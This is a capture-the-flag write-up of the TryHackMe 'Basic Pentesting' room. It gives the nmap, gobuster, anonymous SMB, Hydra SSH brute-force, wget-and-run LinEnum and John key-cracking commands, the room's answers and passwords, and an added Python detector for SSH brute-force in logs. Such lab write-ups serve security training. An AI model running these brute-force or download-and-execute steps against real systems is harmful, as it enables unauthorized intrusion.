Challenges: Basic Pentesting (TryHackMe)

Jebitok

This article will cover the Basic Pentesting write-up on THM Challenges.

Web App Testing and Privilege Escalation

In this set of tasks you'll learn the following:

  • brute forcing

  • hash cracking

  • service enumeration

  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

Answer the questions below

  1. Deploy the machine and connect to our network

  2. Find the services exposed by the machine

  3. What is the name of the hidden directory on the web server (enter name without /)? development

nmap -sV -p 1-65000 <IP_Address>

gobuster dir -u <IP_Address> -w /usr/share/wordlists/dirb/common.txt

  1. Use brute-forcing to find the username & password

  2. What is the username? jan
    smbclient -L \\\\<IP_Address>\\ -N

    smbclient \\\\10.10.11.217\\Anonymous -N
    // this launches the SMB client on the Anonymous share (without -L, which only lists shares)

    smb: \> ls

    smb: \> get staff.txt
    // we’ll access the staff.txt file

    smb: \> exit

    cat staff.txt // we’ll find two users

  3. What is the password? armando

    There are a lot of Hydra commands, but the one that worked for this case was the one that uses SSH

    hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.143.82

  4. What service do you use to access the server (answer in abbreviation in all caps)? SSH

  5. Enumerate the machine to find any vectors for privilege escalation

    On one tab, start the server on port 8000: python3 -m http.server 8000

    On another, run the following commands:

    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    wget http://10.10.144.83:8000/LinEnum.sh

    chmod +x LinEnum.sh

    ./LinEnum.sh

  6. What is the name of the other user you found (all lowercase)? kay

  7. If you have found another user, what can you do with this information?

    For this last part, you’ll be using John and SSH2John.py to find the id_rsa and later on the password

  8. What is the final password you obtain? heresareallystrongpasswordthatfollowsthepasswordpolicy$$
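The defender's view of the Hydra SSH step above, as an added example that is not part of the original write-up or the room: a Python check that flags a source address with repeated failed SSH password attempts against one account and records whether a successful login followed. The log lines are constructed samples in the usual OpenSSH auth.log format, and the function name and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log (documentation IP ranges, not data from the room).
SAMPLE_LOG = "\n".join(
    [f"Apr 10 12:00:{s:02d} host sshd[1201]: Failed password for jan "
     f"from 203.0.113.5 port {40000 + s} ssh2" for s in range(6)]
    + [
        "Apr 10 12:00:07 host sshd[1201]: Accepted password for jan from 203.0.113.5 port 40007 ssh2",
        # A single mistyped password followed by a login: should not alert.
        "Apr 10 12:05:00 host sshd[1310]: Failed password for kay from 198.51.100.7 port 51000 ssh2",
        "Apr 10 12:05:09 host sshd[1310]: Accepted password for kay from 198.51.100.7 port 51001 ssh2",
        "Apr 10 12:06:00 host sshd[1400]: Failed password for invalid user admin from 203.0.113.5 port 40100 ssh2",
    ]
)

# Matches sshd password-authentication results, including "invalid user" failures.
EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text, threshold=5):
    """Return {(ip, user): {"failures": n, "compromised": bool}} for every pair
    that reached `threshold` consecutive failed passwords (threshold is assumed)."""
    streak = defaultdict(int)   # consecutive failures per (ip, user)
    alerts = {}
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            streak[key] += 1
            if streak[key] >= threshold:
                alerts.setdefault(key, {"failures": 0, "compromised": False})
                alerts[key]["failures"] = streak[key]
        else:
            # A success right after a flagged streak means the guess worked.
            if key in alerts:
                alerts[key]["compromised"] = True
            streak[key] = 0
    return alerts


if __name__ == "__main__":
    for (ip, user), info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} -> {user}: {info['failures']} failures, compromised={info['compromised']}")
```

An alert with `compromised=True` is the case that needs an immediate password reset and session review; rate limiting, key-only authentication, or tools such as fail2ban address the failures themselves.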

Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges.
